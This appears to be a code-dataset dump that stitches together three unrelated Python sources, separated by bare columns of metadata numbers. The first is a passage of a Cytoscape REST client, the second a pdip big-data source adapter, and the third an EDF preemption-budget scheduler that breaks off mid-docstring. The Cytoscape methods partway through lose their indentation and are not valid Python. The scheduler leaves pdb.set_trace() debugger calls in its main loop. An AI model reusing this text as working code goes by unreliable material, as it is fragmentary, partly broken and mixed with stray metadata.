    endpoint = self.___url + 'networks/views/currentNetworkView'
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def getGroupCount(self, networkId, verbose=None):
    """
    Count the groups in the network.

    :param networkId: Network SUID
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{}networks/{}/groups/count'.format(self.___url, networkId)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def deleteEdge(self, networkId, edgeId, verbose=None):
    """
    Remove the edge selected by `edgeId` from the network selected by
    `networkId`.

    :param networkId: SUID of the network containing the edge.
    :param edgeId: SUID of the edge
    :param verbose: print more
    :returns: default: successful operation
    """
    endpoint = '{}networks/{}/edges/{}'.format(self.___url, networkId, edgeId)
    return api(url=endpoint, method="DELETE", verbose=verbose)
def getEdge(self, networkId, edgeId, verbose=None):
    """
    Fetch an edge together with its associated row data.

    :param networkId: SUID of the network containing the edge
    :param edgeId: SUID of the edge
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{}networks/{}/edges/{}'.format(self.___url, networkId, edgeId)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def getRows(self, networkId, tableType, verbose=None):
    """
    Fetch all rows of the table selected by `networkId` and `tableType`, as a
    JSON array of row objects.

    ```
    [
        {
            "SUID": 101,
            "gene_name": "brca1",
            "exp": 0.1
        },
        {
            "SUID": 102,
            "gene_name": "brca2",
            "exp": 0.2
        }
    ]
    ```

    :param networkId: SUID of the network containing the table
    :param tableType: Table Type
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{}networks/{}/tables/{}/rows'.format(self.___url, networkId, tableType)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def getNodeCount(self, networkId, verbose=None):
    """
    Count the nodes in the network selected by `networkId`.

    :param networkId: SUID of the network containing the nodes
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{}networks/{}/nodes/count'.format(self.___url, networkId)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def getNeighborsSelected(self, networkId, verbose=None):
    """
    Fetch the neighbors of the currently selected nodes in the network
    selected by `networkId`, as a list of SUIDs. The nodes of the original
    selection are not included.

    :param networkId: SUID of the network
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{}networks/{}/nodes/selected/neighbors'.format(self.___url, networkId)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def deleteFirstNetworkView(self, networkId, verbose=None):
"""
Deletes the first available Network View for the Network specified by the `networkId` parameter. Cytoscape can have multiple views per network model, but this feature is not exposed in the Cytoscape GUI. GUI access is limited to the first available view only.
:param networkId: SUID of the Network
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/first', method="DELETE", verbose=verbose)
return response
def getFirstNetworkView(self, networkId, file, verbose=None):
"""
This returns the first view of the network. Cytoscape can have multiple views per network model, but this feature is not exposed in the Cytoscape GUI. GUI access is limited to the first available view only.
If the `file` parameter is left unspecified, the response will contain data in [Cytoscape.js](http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html#cytoscape-js-json) format.
If the `file` parameter is specified, the Network View will be written to a file, and the response will contain the location of the file in the following format:
```
{
"file": "/media/HD1/myFiles/networkView.sif"
}
```
The format of the output file is defined by the extension of the `file` parameter.
:param networkId: SUID of the Network
:param file: A path to a file relative to the current directory. The format of the file written is defined by the file extension.
| Extension | Details |
| ----------- | -----------|
| .cys | Cytoscape Style format |
| .xml/.xgmml | [XGMML](http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html?highlight=xgmml#xgmml-format) format |
| .nnf | [NNF](http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html#nnf) format |
| .sif | [SIF](http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html#sif-format) format |
| .cyjs | [Cytoscape.js](http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html#cytoscape-js-json) format |
-- Not required, can be None
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/first', PARAMS={'file':file}, method="GET", verbose=verbose, parse_params=False)
return response
def getAdjEdges(self, networkId, nodeId, verbose=None):
"""
Returns a list of connected edges as SUIDs for the node specified by the `nodeId` and `networkId` parameters.
:param networkId: SUID of the network containing the node
:param nodeId: SUID of the node
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/nodes/'+str(nodeId)+'/adjEdges', method="GET", verbose=verbose, parse_params=False)
return response
def createNetworkView(self, networkId, verbose=None):
"""
Creates a new Network View for the Network specified by the `networkId` parameter.
:param networkId: SUID of the Network
:param verbose: print more
:returns: 201: Network View SUID
"""
PARAMS=set_param(['networkId'],[networkId])
response=api(url=self.___url+'networks/'+str(networkId)+'/views', PARAMS=PARAMS, method="POST", verbose=verbose)
return response
def deleteAllNetworkViews(self, networkId, verbose=None):
"""
Deletes all Network Views available in the Network specified by the `networkId` parameter. Cytoscape can have multiple views per network model, but this feature is not exposed in the Cytoscape GUI. GUI access is limited to the first available view only.
:param networkId: SUID of the Network
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views', method="DELETE", verbose=verbose)
return response
def getAllNetworkViews(self, networkId, verbose=None):
"""
Returns an array of all network views belonging to the network specified by the `networkId` paramter. The response is a list of Network SUIDs.
:param networkId: SUID of the Network
:param verbose: print more
:returns: 200: An array of Network View SUIDs
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views', method="GET", verbose=verbose, parse_params=False)
return response
def getEdgeComponent(self, networkId, edgeId, type, verbose=None):
"""
Returns the SUID of the source or target node of the edge specified by the `edgeId` and `networkId` parameters.
Return values can be in one of two formats, depending on the value specified in the `type` parameter:
```
{
"source": 101
}
```
```
{
"target": 102
}
```
:param networkId: SUID of the network containing the edge
:param edgeId: SUID of the edge
:param type: The node type to return
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/edges/'+str(edgeId)+'/'+str(type)+'', method="GET", verbose=verbose, parse_params=False)
return response
def updateNetworkView(self, networkId, viewId, bypass, body, verbose=None):
"""
Updates the Visual Properties in the Network View specified by the `viewId` and `networkId` parameters.
Example Visual Properties:
```
{
"visualProperty": "NETWORK_BACKGROUND_PAINT",
"value": "#000000"
}```
```
{
"visualProperty": "NETWORK_CENTER_X_LOCATION",
"value": 250
}```
Additional details on common Visual Properties can be found in the [Basic Visual Lexicon JavaDoc API](http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html)
Note that this sets the Visual Properties temporarily unless the `bypass` parameter is set to `true`. If the `bypass` parameter is set to `true`, the Visual Style will be overridden by these Visual Property values. If the `bypass` parameter is not used or is set to `false`, any Visual Properties set will return to those defined in the Visual Style if the Network View is updated.
:param networkId: Network SUID
:param viewId: Network View SUID
:param bypass: Bypass the Visual Style with these properties -- Not required, can be None
:param body: A list of Visual Properties and their values.
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'/network', method="PUT", body=body, verbose=verbose)
return response
def getNetworkVisualProps(self, networkId, viewId, verbose=None):
"""
Returns a list of the Visual Properties for the Network View specified by the `viewId` and `networkId` parameters.
Additional details on common Visual Properties can be found in the [Basic Visual Lexicon JavaDoc API](http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html)
:param networkId: SUID of the Network
:param viewId: SUID of the Network View
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'/network', method="GET", verbose=verbose, parse_params=False)
return response
def createGroup(self, networkId, body, verbose=None):
"""
Create a new group in the network specified by the parameter `networkId`. The contents are specified the message body.
:param networkId: SUID of the Network
:param body: New Group name and contents
:param verbose: print more
:returns: 200: successful operation
"""
PARAMS=set_param(['networkId','body'],[networkId,body])
response=api(url=self.___url+'networks/'+str(networkId)+'/groups', PARAMS=PARAMS, method="POST", verbose=verbose)
return response
def deleteAllGroups(self, networkId, verbose=None):
"""
Deletes all groups in the network specified by `networkId` parameter. The nodes and edges that the groups contained will remain present in the network, however the nodes used to identify the Groups will be deleted.
:param networkId: SUID of the Network
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/groups', method="DELETE", verbose=verbose)
return response
def getAllGroups(self, networkId, verbose=None):
"""
Returns a list of all the groups in the network specified by the `networkId` parameter.
:param networkId: Network SUID
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/groups', method="GET", verbose=verbose, parse_params=False)
return response
def getImageAsSvg(self, networkId, viewId, h, verbose=None):
"""
Returns an SVG image of the Network View specified by the `viewId` and `networkId` parameters.
Default size is 600 px.
:param networkId: SUID of the Network
:param viewId: SUID of the Network View
:param h: Height of the image. Width is set automatically -- Not required, can be None
:param verbose: print more
:returns: 200: SVG image stream.
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'.svg', PARAMS={'h':h}, method="GET", verbose=verbose, parse_params=False)
return response
def getImageAsPng(self, networkId, viewId, h, verbose=None):
"""
Returns a PNG image of the Network View specified by the `viewId` and `networkId` parameters.
Default size is 600 px.
:param networkId: SUID of the Network
:param viewId: SUID of the Network View
:param h: Height of the image. Width is set automatically -- Not required, can be None
:param verbose: print more
:returns: 200: PNG image stream.
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'.png', PARAMS={'h':h}, method="GET", verbose=verbose, parse_params=False)
return response
def getFirstImageAsSvg(self, networkId, h, verbose=None):
"""
Returns an SVG image of the first available Network View for the Network specified by the `networkId` parameter.
Default size is 600 px
:param networkId: SUID of the Network
:param h: Height of the image. Width is set automatically -- Not required, can be None
:param verbose: print more
:returns: 200: SVG image stream.
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/first.svg', PARAMS={'h':h}, method="GET", verbose=verbose, parse_params=False)
return response
| 40.762224
| 389
| 0.658582
| 7,321
| 60,858
| 5.424532
| 0.060238
| 0.020145
| 0.024476
| 0.035051
| 0.87664
| 0.854103
| 0.824944
| 0.789741
| 0.772241
| 0.730617
| 0
| 0.006822
| 0.241332
| 60,858
| 1,492
| 390
| 40.789544
| 0.853306
| 0.559318
| 0
| 0.330677
| 0
| 0
| 0.102582
| 0.006699
| 0
| 0
| 0
| 0
| 0
| 1
| 0.322709
| false
| 0.055777
| 0.003984
| 0
| 0.649402
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 9
|
91742e29031a9a152eb085356856b78ba9fca01a
| 3,193
|
py
|
Python
|
pdip/integrator/connection/types/bigdata/adapters/source/big_data_source_adapter.py
|
ahmetcagriakca/pdip
|
c4c16d5666a740154cabdc6762cd44d98b7bdde8
|
[
"MIT"
] | 2
|
2021-12-09T21:07:46.000Z
|
2021-12-11T22:18:01.000Z
|
pdip/integrator/connection/types/bigdata/adapters/source/big_data_source_adapter.py
|
PythonDataIntegrator/pdip
|
c4c16d5666a740154cabdc6762cd44d98b7bdde8
|
[
"MIT"
] | null | null | null |
pdip/integrator/connection/types/bigdata/adapters/source/big_data_source_adapter.py
|
PythonDataIntegrator/pdip
|
c4c16d5666a740154cabdc6762cd44d98b7bdde8
|
[
"MIT"
] | 3
|
2021-11-15T00:47:00.000Z
|
2021-12-17T11:35:45.000Z
|
from typing import Any, List

from injector import inject

from pdip.integrator.connection.base import ConnectionSourceAdapter
from pdip.integrator.connection.types.bigdata.base import BigDataProvider
from pdip.integrator.integration.domain.base import IntegrationBase
class BigDataSourceAdapter(ConnectionSourceAdapter):
    """Source adapter that reads rows from a big-data connection.

    All three read operations share the same setup: obtain a connection
    context for the integration's big-data source and decide which query to
    run. That setup previously appeared verbatim in each method; it now lives
    in :meth:`_prepare`.
    """

    @inject
    def __init__(self,
                 provider: BigDataProvider,
                 ):
        self.provider = provider

    def _prepare(self, integration: IntegrationBase):
        """Return ``(context, query)`` for the integration's big-data source.

        Uses the explicitly configured query when one is present; otherwise
        builds a ``SELECT *`` query from the configured schema and table.

        :raises Exception: if neither a query nor a schema/table pair is configured.
        """
        source = integration.SourceConnections.BigData
        context = self.provider.get_context_by_config(config=source.Connection)
        query = source.Query
        if query is None or query == '':
            schema = source.Schema
            table = source.ObjectName
            if schema is None or schema == '' or table is None or table == '':
                raise Exception(f"Source Schema and Table required. {schema}.{table}")
            query = context.dialect.get_table_select_query(selected_rows='*', schema=schema, table=table)
        return context, query

    def get_source_data_count(self, integration: IntegrationBase) -> int:
        """Return the number of rows the source query yields."""
        context, query = self._prepare(integration)
        return context.get_table_count(query=query)

    def get_source_data(self, integration: IntegrationBase) -> List[Any]:
        """Return all rows yielded by the source query."""
        context, query = self._prepare(integration)
        return context.get_table_data(query=query)

    def get_source_data_with_paging(self, integration: IntegrationBase, start, end) -> List[Any]:
        """Return the page of rows between `start` and `end` from the source query."""
        context, query = self._prepare(integration)
        return context.get_table_data_with_paging(
            query=query,
            start=start,
            end=end
        )
| 54.118644
| 116
| 0.705606
| 341
| 3,193
| 6.451613
| 0.16129
| 0.229091
| 0.286364
| 0.163636
| 0.716364
| 0.716364
| 0.716364
| 0.716364
| 0.716364
| 0.716364
| 0
| 0
| 0.212339
| 3,193
| 58
| 117
| 55.051724
| 0.874751
| 0
| 0
| 0.568627
| 0
| 0
| 0.047917
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.078431
| false
| 0
| 0.098039
| 0
| 0.254902
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
919ed8f0ad1d905cb001d29c8ec96e6e35189fc9
| 38,660
|
py
|
Python
|
code/jobscheduling/schedulers/BlockPBEDF.py
|
mdskrzypczyk/LinkScheduling
|
46b4a676976f3429f6b5a28685386ed712f1bbe0
|
[
"MIT"
] | null | null | null |
code/jobscheduling/schedulers/BlockPBEDF.py
|
mdskrzypczyk/LinkScheduling
|
46b4a676976f3429f6b5a28685386ed712f1bbe0
|
[
"MIT"
] | null | null | null |
code/jobscheduling/schedulers/BlockPBEDF.py
|
mdskrzypczyk/LinkScheduling
|
46b4a676976f3429f6b5a28685386ed712f1bbe0
|
[
"MIT"
] | null | null | null |
from queue import PriorityQueue
from jobscheduling.log import LSLogger
from jobscheduling.schedulers.scheduler import Scheduler, verify_budget_schedule
from jobscheduling.task import get_lcm_for
logger = LSLogger()
class UniResourcePreemptionBudgetScheduler(Scheduler):
    def schedule_tasks(self, taskset, topology=None):
        """
        Main scheduling function for uniprocessor EDF-LBF

        Simulates the passage of time: released tasks enter the ready queue
        (ordered by deadline); partially-run, preempted tasks sit in the
        active queue (ordered by remaining preemption budget ``k``). Any
        branch that detects a deadline miss aborts with a failed schedule.

        :param taskset: type list
            List of PeriodicTasks to schedule
        :param topology: tuple
            Tuple of networkx.Graphs that represent the communication resources and connectivity graph of the network
            (not used by this uniprocessor scheduler)
        :return: list
            Contains a tuple of (taskset, schedule, valid) where valid indicates if the schedule is valid
        """
        original_taskset = taskset
        taskset = self.preprocess_taskset(taskset)
        self.ready_queue = PriorityQueue()
        self.active_queue = []
        self.curr_task = None
        self.schedule = []

        # First sort the taskset by activation time
        hyperperiod = get_lcm_for([t.p for t in original_taskset])
        self.taskset_lookup = dict([(t.name, t) for t in original_taskset])
        self.instance_count = dict([(t.name, hyperperiod // t.p - 1) for t in original_taskset])
        self.taskset = self.initialize_taskset(taskset)
        self.taskset = list(sorted(self.taskset, key=lambda task: (task.a, task.d)))

        # Let time evolve and simulate scheduling, start at first task
        self.curr_time = self.taskset[0].a
        while self.taskset or not self.ready_queue.empty() or self.active_queue:
            # Get all released tasks into the ready queue
            self.populate_ready_queue()

            # Only need to worry about the active tasks (if any)
            if self.ready_queue.empty() or self.active_queue and self.active_queue[0][0].k <= 0:
                if self.active_queue and self.active_queue[0][0].k < 0:
                    # NOTE(review): leftover debugger trap — fires if a
                    # preemption budget ever goes negative (invariant breach).
                    import pdb
                    pdb.set_trace()
                # If there is a current task resume it
                if self.curr_task:
                    preempt = self.active_queue and self.active_queue[0][0].k <= 0 and self.curr_task.k > 0
                    if preempt:
                        next_active_task, time = self.active_queue.pop(0)
                        if self.curr_task != next_active_task:
                            self.preempt_curr_task()
                        # Deadline miss — infeasible schedule
                        if self.curr_time > next_active_task.d - next_active_task.c:
                            return [(taskset, None, False)]
                        self.schedule_until_next_event(next_active_task)
                    else:
                        if self.curr_time > self.curr_task.d - self.curr_task.c:
                            return [(taskset, None, False)]
                        self.schedule_until_next_event(self.curr_task)
                # No current task, resume an active job
                elif self.active_queue:
                    next_active_task, time = self.active_queue.pop(0)
                    if self.curr_time > next_active_task.d - next_active_task.c:
                        return [(taskset, None, False)]
                    self.schedule_until_next_event(next_active_task)
                elif self.taskset:
                    # Nothing runnable — fast-forward to the next release
                    self.curr_time = self.taskset[0].a
            # We might need to introduce a new task into the active set
            else:
                p, next_ready_task = self.ready_queue.get()
                if self.curr_time > next_ready_task.d - next_ready_task.c:
                    return [(taskset, None, False)]
                preempt = True
                active_tasks = [(task, entry_time) for task, entry_time in self.active_queue]
                if self.curr_task is not None:
                    active_tasks.append((self.curr_task, self.curr_time))
                active_tasks = list(sorted(active_tasks, key=lambda t: (t[0].k, t[1], t[0].name)))

                # First compute the excess budget for each task
                excess_budget = []
                cumulative_comp_time = []
                deadline_slack = []
                comp_time = 0
                for task, _ in active_tasks:
                    excess_budget.append(task.k - comp_time)
                    cumulative_comp_time.append(comp_time)
                    deadline_slack.append(task.d - self.curr_time - task.c - comp_time)
                    comp_time += task.c
                cumulative_comp_time.append(comp_time)

                # Find the earliest place in the active task queue that can tolerate full computation of new task
                first_idx = len(excess_budget)
                for idx in range(len(excess_budget) - 1, -1, -1):
                    if excess_budget[idx] < next_ready_task.c or deadline_slack[idx] - next_ready_task.c < 0:
                        break
                    else:
                        first_idx -= 1

                # new task cannot run to completion without violating budgets
                if first_idx != 0:
                    # Otherwise some tasks get violated, see if we can find a place to preempt new task into
                    earliest_idx = first_idx
                    for idx in range(first_idx, len(excess_budget)):
                        if cumulative_comp_time[idx] <= next_ready_task.k:
                            break
                        else:
                            earliest_idx += 1

                    if cumulative_comp_time[earliest_idx - 1] + active_tasks[earliest_idx - 1][0].c > next_ready_task.k:
                        preempt = False

                    # We want to insert the next_ready_task into this location to respect budgets
                    min_t = max(1, active_tasks[earliest_idx - 1][0].k - next_ready_task.k)
                    violated_idx = -1
                    max_t = min([task.k for task, _ in active_tasks] + deadline_slack)
                    for idx in range(earliest_idx - 1, -1, -1):
                        if excess_budget[idx] - min_t < 0 or deadline_slack[idx] - min_t < 0:
                            violated_idx = idx
                        else:
                            max_t = min(max_t, excess_budget[idx], deadline_slack[idx])

                    if violated_idx != -1:
                        preempt = False

                    if max_t - min_t < 0:
                        preempt = False

                    # If conditions satisfied preempt the task and run
                    if preempt:
                        if self.curr_task:
                            self.preempt_curr_task()
                            self.curr_task = None
                        self.schedule_until_next_event(next_ready_task, min_t)
                        if self.curr_task:
                            self.preempt_curr_task()
                            self.curr_task = None
                    # Otherwise run the current task or consume the active queue
                    else:
                        # Put the new task back; it will be reconsidered later
                        self.ready_queue.put((next_ready_task.d, next_ready_task))
                        if self.curr_task:
                            preempt = self.active_queue and self.active_queue[0][0].k <= 0 and self.curr_task.k > 0
                            if preempt:
                                self.preempt_curr_task()
                                next_active_task, time = self.active_queue.pop(0)
                                if self.curr_time > next_active_task.d - next_active_task.c:
                                    return [(taskset, None, False)]
                                self.schedule_until_next_event(next_active_task)
                            else:
                                if self.curr_time > self.curr_task.d - self.curr_task.c:
                                    return [(taskset, None, False)]
                                self.schedule_until_next_event(self.curr_task)
                        elif self.active_queue:
                            next_active_task, time = self.active_queue.pop(0)
                            if self.curr_time > next_active_task.d - next_active_task.c:
                                return [(taskset, None, False)]
                            self.schedule_until_next_event(next_active_task)
                        # Nothing to run, fast forward to next release
                        elif self.taskset:
                            self.curr_time = self.taskset[0].a
                else:
                    # New task fits without violating any budget — run it now
                    if self.curr_task:
                        self.preempt_curr_task()
                    self.schedule_until_next_event(next_ready_task)

        # Restore the per-task c/k values that the simulation consumed
        for _, _, t in self.schedule:
            original_taskname, _ = t.name.split('|')
            t.c = self.taskset_lookup[original_taskname].c
            t.k = self.taskset_lookup[original_taskname].k

        valid = verify_budget_schedule(original_taskset, self.schedule)
        taskset = original_taskset
        return [(taskset, self.schedule, valid)]
def preempt_curr_task(self):
"""
Preempts the current active task and places it in the active queue
:return: None
"""
task = self.curr_task
entry_time = self.curr_time
self.active_queue.append((task, entry_time))
self.active_queue = list(sorted(self.active_queue, key=lambda t: (t[0].k, t[1], t[0].name)))
def populate_ready_queue(self):
"""
Populates the ready queue with any tasks that are available, sorted by deadline
:return: None
"""
while self.taskset and self.taskset[0].a <= self.curr_time:
task = self.taskset.pop(0)
self.ready_queue.put((task.d, task))
def update_active_queue(self, time):
"""
Updates the preemption budget of tasks in the active queue
:param time: type int
The amount of time to reduce from preemption budgets
:return: None
"""
for task, _ in self.active_queue:
task.k -= time
def add_to_schedule(self, task, duration):
"""
Adds a task to the internal schedule and updates the preemption budgets of tasks in the active queue
:param task: type Task
The task to add to the schedule
:param duration: type int
The amount of time that the task executes for
:return: Nome
"""
super(UniResourcePreemptionBudgetScheduler, self).add_to_schedule(task, duration)
self.update_active_queue(duration)
    def schedule_until_next_event(self, task, ttne=None):
        """
        Schedules a task until the next point we should make a new scheduling decision

        The run length is the minimum of several "time until X" horizons
        computed below, unless an explicit `ttne` override is given. If the
        task does not finish within that window it becomes the current task;
        otherwise its next periodic instance (if any) is released.

        :param task: type Task
            The task to add to the schedule
        :param ttne: type int
            A preset time-til-next-event to run the task for rather than determining from system parameters
        :return: None
        """
        # Time To Release of next task into ready queue
        ttr = (self.taskset[0].a - self.curr_time) if self.taskset else float('inf')

        # Time to consider next ready task
        if not self.ready_queue.empty():
            ttnr = 1
        elif self.taskset:
            ttnr = self.taskset[0].a - self.curr_time
        else:
            ttnr = float('inf')

        # Time To Empty Budget in active queue
        ttb = self.active_queue[0][0].k if self.active_queue and task.k > 0 else float('inf')

        # Time to task completion
        ttc = task.c

        # Time until possible to put next ready task into active queue
        ttp = float('inf')

        # Schedule this task to run until the next scheduling decision
        proc_time = min(ttr, ttnr, ttb, ttc, ttp)
        if ttne is not None:
            proc_time = ttne

        self.add_to_schedule(task, proc_time)

        # If the amount of time the task is run does not allow it to complete, it will be the current task at the time
        # of the next scheduling decision
        if proc_time < task.c:
            task.c -= proc_time
            self.curr_task = task
        else:
            # Task completed: release the next instance of its periodic task,
            # keeping the pending taskset sorted by (release, deadline).
            original_taskname, instance = task.name.split('|')
            instance = int(instance)
            if instance < self.instance_count[original_taskname]:
                periodic_task = self.taskset_lookup[original_taskname]
                task_instance = self.create_new_task_instance(periodic_task, instance + 1)
                self.taskset = list(sorted(self.taskset + [task_instance], key=lambda task: (task.a, task.d)))
            self.curr_task = None
class UniResourceFixedPointPreemptionBudgetScheduler(UniResourcePreemptionBudgetScheduler):
    def schedule_tasks(self, taskset, topology=None):
        """
        Main scheduling function for uniprocessor EDF-LBF with fixed preemption points

        Same simulation as the base scheduler, except a newly admitted task
        may only be preempted at one of its fixed preemption points: the
        admissible run lengths are filtered against `preemption_points`.

        :param taskset: type list
            List of PeriodicTasks to schedule
        :param topology: tuple
            Tuple of networkx.Graphs that represent the communication resources and connectivity graph of the network
            (not used by this uniprocessor scheduler)
        :return: list
            Contains a tuple of (taskset, schedule, valid) where valid indicates if the schedule is valid
        """
        original_taskset = taskset
        taskset = self.preprocess_taskset(taskset)
        self.ready_queue = PriorityQueue()
        self.active_queue = []
        self.curr_task = None
        self.schedule = []

        # First sort the taskset by activation time
        hyperperiod = get_lcm_for([t.p for t in original_taskset])
        self.taskset_lookup = dict([(t.name, t) for t in original_taskset])
        self.instance_count = dict([(t.name, hyperperiod // t.p - 1) for t in original_taskset])
        self.taskset = self.initialize_taskset(taskset)
        self.taskset = list(sorted(self.taskset, key=lambda task: (task.a, task.d)))

        # Let time evolve and simulate scheduling, start at first task
        self.curr_time = self.taskset[0].a
        while self.taskset or not self.ready_queue.empty() or self.active_queue:
            # Get all released tasks into the ready queue
            self.populate_ready_queue()

            # Only need to worry about the active tasks (if any)
            if self.ready_queue.empty() or self.active_queue and self.active_queue[0][0].k <= 0:
                if self.active_queue and self.active_queue[0][0].k < 0:
                    # NOTE(review): leftover debugger trap — fires if a
                    # preemption budget ever goes negative (invariant breach).
                    import pdb
                    pdb.set_trace()
                # If there is a current task resume it
                if self.curr_task:
                    preempt = self.active_queue and self.active_queue[0][0].k <= 0 and self.curr_task.k > 0
                    if preempt:
                        next_active_task, time = self.active_queue.pop(0)
                        if self.curr_task != next_active_task:
                            self.preempt_curr_task()
                        self.schedule_until_next_event(next_active_task)
                    else:
                        self.schedule_until_next_event(self.curr_task)
                # No current task, resume an active job
                elif self.active_queue:
                    next_active_task, time = self.active_queue.pop(0)
                    self.schedule_until_next_event(next_active_task)
                elif self.taskset:
                    # Nothing runnable — fast-forward to the next release
                    self.curr_time = self.taskset[0].a
            # We might need to introduce a new task into the active set
            else:
                p, next_ready_task = self.ready_queue.get()
                if self.curr_time > next_ready_task.d - next_ready_task.c:
                    return [(taskset, None, False)]
                preempt = True
                active_tasks = [(task, entry_time) for task, entry_time in self.active_queue]
                if self.curr_task is not None:
                    active_tasks.append((self.curr_task, self.curr_time))
                active_tasks = list(sorted(active_tasks, key=lambda t: (t[0].k, t[1], t[0].name)))

                # First compute the excess budget for each task
                excess_budget = []
                cumulative_comp_time = []
                deadline_slack = []
                comp_time = 0
                for task, _ in active_tasks:
                    excess_budget.append(task.k - comp_time)
                    cumulative_comp_time.append(comp_time)
                    deadline_slack.append(task.d - self.curr_time - task.c - comp_time)
                    comp_time += task.c
                cumulative_comp_time.append(comp_time)

                # Find the earliest place in the active task queue that can tolerate full computation of new task
                first_idx = len(excess_budget)
                for idx in range(len(excess_budget) - 1, -1, -1):
                    if excess_budget[idx] < next_ready_task.c or deadline_slack[idx] - next_ready_task.c < 0:
                        break
                    else:
                        first_idx -= 1

                # new task cannot run to completion without violating budgets
                if first_idx != 0:
                    # Otherwise some tasks get violated, see if we can find a place to preempt new task into
                    earliest_idx = first_idx
                    for idx in range(first_idx, len(excess_budget)):
                        if cumulative_comp_time[idx] <= next_ready_task.k:
                            break
                        else:
                            earliest_idx += 1

                    if cumulative_comp_time[earliest_idx - 1] + active_tasks[earliest_idx - 1][0].c > next_ready_task.k:
                        preempt = False

                    # We want to insert the next_ready_task into this location to respect budgets
                    min_t = max(1, active_tasks[earliest_idx - 1][0].k - next_ready_task.k)
                    violated_idx = -1
                    max_t = min([task.k for task, _ in active_tasks])
                    for idx in range(earliest_idx - 1, -1, -1):
                        if excess_budget[idx] - min_t < 0 or deadline_slack[idx] - min_t < 0:
                            violated_idx = idx
                        else:
                            max_t = min(max_t, excess_budget[idx], deadline_slack[idx])

                    if violated_idx != -1:
                        preempt = False

                    if max_t - min_t < 0:
                        preempt = False

                    # Restrict the run length to the task's fixed preemption
                    # points that fall within [min_t, max_t]
                    original_name_next_ready = next_ready_task.name.split('|')[0]
                    completed_comp_time = self.taskset_lookup[original_name_next_ready].c - next_ready_task.c
                    comp_times = [pp[0][0] - completed_comp_time - next_ready_task.a for pp in
                                  next_ready_task.preemption_points]
                    comp_times = sorted(filter(lambda time: min_t <= time <= max_t, comp_times))
                    if not comp_times:
                        preempt = False

                    # If conditions satisfied preempt the task and run
                    if preempt:
                        if self.curr_task:
                            self.preempt_curr_task()
                        comp_time = comp_times[0]
                        self.schedule_until_next_event(next_ready_task, comp_time)
                        if self.curr_task:
                            self.preempt_curr_task()
                            self.curr_task = None
                    # Otherwise run the current task or consume the active queue
                    else:
                        # Put the new task back; it will be reconsidered later
                        self.ready_queue.put((next_ready_task.d, next_ready_task))
                        if self.curr_task:
                            preempt = self.active_queue and self.active_queue[0][0].k <= 0 and self.curr_task.k > 0
                            if preempt:
                                self.preempt_curr_task()
                                next_active_task, time = self.active_queue.pop(0)
                                self.schedule_until_next_event(next_active_task)
                            else:
                                self.schedule_until_next_event(self.curr_task)
                        elif self.active_queue:
                            next_active_task, time = self.active_queue.pop(0)
                            self.schedule_until_next_event(next_active_task)
                        # Nothing to run, fast forward to next release
                        elif self.taskset:
                            self.curr_time = self.taskset[0].a
                else:
                    # New task fits without violating any budget — run it now
                    if self.curr_task:
                        self.preempt_curr_task()
                    self.schedule_until_next_event(next_ready_task)

        # Restore the per-task c/k values that the simulation consumed
        for _, _, t in self.schedule:
            original_taskname, _ = t.name.split('|')
            t.c = self.taskset_lookup[original_taskname].c
            t.k = self.taskset_lookup[original_taskname].k

        valid = verify_budget_schedule(original_taskset, self.schedule)
        taskset = original_taskset
        return [(taskset, self.schedule, valid)]
    def schedule_until_next_event(self, task, ttne=None):
        """
        Schedules a task until the next point we should make a new scheduling decision

        Unlike the base scheduler, the run length is constrained to the
        task's fixed preemption points: the task either runs to completion
        or up to the latest preemption point that fits inside the budget
        window, unless an explicit `ttne` override is given.

        :param task: type Task
